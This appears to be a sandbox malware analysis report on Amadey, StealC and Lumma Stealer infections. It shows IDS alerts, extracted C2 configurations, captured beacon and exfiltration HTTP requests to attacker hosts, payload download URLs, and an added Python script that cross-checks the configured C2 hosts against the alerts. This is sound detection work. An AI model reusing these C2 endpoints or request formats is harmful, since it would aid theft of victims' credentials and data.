Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:53917 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49977 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:53570 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:58144 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50044 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:55499 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50049 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:53008 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49833 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49833 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49823 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49901 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49901 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49962 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50001 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50012 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49907 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49907 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50012 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49890 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50040 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50018 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50018 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50050 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49949 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50047 -> 104.21.53.8:443
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor IPs: 185.215.113.43
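The configuration pulled from memory (Amadey, StealC and LummaC, see the "Malware Configuration Extractor" lines above) and the Suricata alerts can be cross-checked mechanically: every configured C2 should appear either as a DNS-lookup alert (Lumma's domains are defanged as "name .tld" in the rule message) or as the destination IP of a check-in alert, and any C2 that never shows up is a sign the run did not reach that stage. The Python below is an added example, not part of the Joe Sandbox report or of any tool named on this page; REPORT_EXCERPT is a subset of lines copied from this report, and the two line formats it parses are assumed from what is shown above.

```python
"""Cross-check extracted C2 configuration against Suricata alert lines.

Added example (not from the sandbox or the malware families' own code).
Parses "Malware Configuration Extractor" and "Suricata IDS" lines in the
report's text format and reports which configured C2 hosts were seen,
either as a defanged domain in a DNS-lookup alert message or as the
destination IP of a network alert. REPORT_EXCERPT is a subset of this report.
"""
import json
import re
from urllib.parse import urlsplit

REPORT_EXCERPT = """\
Source: 00000000.00000002.1721238447.00000000007C1000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 15.0.num.exe.650000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: ea2c7beae0.exe.5744.7.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.site", "studennotediw.store", "eaglepawnoy.store", "clearancek.site", "spirittunek.store", "bathdoomgaz.store", "mobbipenju.store", "dissapoiznw.store"], "Build id": "4SD0y4--legendaryy"}
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49782 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:58049 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:64331 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49856 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49833 -> 104.21.53.8:443
"""

CONFIG_RE = re.compile(r"Malware Configuration Extractor: (?P<family>\S+) (?P<json>\{.*\})\s*$")
ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.*?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)
# ET rule messages defang the domain as "(name .tld)"; allow an optional space before each dot
DEFANGED_RE = re.compile(r"\(([A-Za-z0-9-]+(?:\s?\.[A-Za-z0-9-]+)+)\)")


def c2_host(value: str) -> str:
    """Reduce a C2 entry (bare domain, host/path, or full URL) to its host name."""
    if "://" not in value:
        value = "http://" + value      # Amadey stores host/path without a scheme
    return urlsplit(value).hostname or ""


def parse_configs(text: str) -> dict:
    """family -> set of C2 hosts, from every extractor line in the text."""
    hosts = {}
    for line in text.splitlines():
        m = CONFIG_RE.search(line)
        if not m:
            continue
        cfg = json.loads(m["json"])
        c2 = cfg.get("C2 url", [])
        if isinstance(c2, str):        # single URL (Amadey, StealC) vs. list (LummaC)
            c2 = [c2]
        hosts.setdefault(m["family"], set()).update(c2_host(u) for u in c2)
    return hosts


def parse_alerts(text: str) -> list:
    """One dict per Suricata alert line: sid, msg, dst IP and any refanged domain from msg."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.search(line)
        if not m:
            continue
        d = DEFANGED_RE.search(m["msg"])
        alerts.append({
            "sid": int(m["sid"]),
            "msg": m["msg"],
            "dst": m["dst"],
            "domain": d.group(1).replace(" ", "") if d else None,  # "(x .store)" -> "x.store"
        })
    return alerts


def contacted_c2(text: str) -> dict:
    """family -> {host: True if the host appeared as an alert destination or DNS lookup}."""
    alerts = parse_alerts(text)
    seen = {a["dst"] for a in alerts} | {a["domain"] for a in alerts if a["domain"]}
    return {fam: {h: h in seen for h in sorted(hosts)}
            for fam, hosts in parse_configs(text).items()}


if __name__ == "__main__":
    for fam, hosts in contacted_c2(REPORT_EXCERPT).items():
        for host, hit in hosts.items():
            print(f"{fam:8} {host:24} {'contacted' if hit else 'not seen in alerts'}")
```

Run against the full report rather than the excerpt, all eight Lumma domains are resolved and both the Amadey and StealC IPs receive check-ins; on the excerpt only two Lumma domains are seen, which the output makes visible instead of leaving it to be counted by hand.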
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:09 GMTETag: "2d8200-624bfbe479d49"Accept-Ranges: bytesContent-Length: 2982400Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:16 GMTETag: "1cb800-624bfbeaba684"Accept-Ranges: bytesContent-Length: 1882112Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:26 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:10:20 GMTETag: "1a8c00-624bf2fe2133d"Accept-Ranges: bytesContent-Length: 1739776Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 18 Oct 2024 13:04:37 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:53 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:16 GMTETag: "1cb800-624bfbeaba684"Accept-Ranges: bytesContent-Length: 1882112Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:23 GMTETag: "1c7c00-624bfbf1b199a"Accept-Ranges: bytesContent-Length: 1866752Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:04:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:09:55 GMTETag: "e1400-624bf2e602712"Accept-Ranges: bytesContent-Length: 922624Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:05:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:16 GMTETag: "1cb800-624bfbeaba684"Accept-Ranges: bytesContent-Length: 1882112Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 30 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000350002&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="build"doma------BAAAAKJKJEBGHJKFHIDG--
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Fri, 18 Oct 2024 12:50:16 GMTIf-None-Match: "1cb800-624bfbeaba684"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 31 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000351031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000357001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Fri, 18 Oct 2024 12:50:09 GMTIf-None-Match: "2d8200-624bfbe479d49"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 36 31 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000361031&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="build"doma------AKEGDHJDHDAFHJJKJEHC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 34 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000401001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="build"doma------FHIDBKFCAAEBFIDHDBAE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 34 33 42 33 45 37 35 41 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="build"doma------GHJDHDAECBGCAKEBAEBA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 34 33 42 33 45 37 35 41 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="build"doma------KFIIJJJDGCBAAKFIIECG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49799 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49830 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49884 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49956 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49956 -> 185.215.113.16:80
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
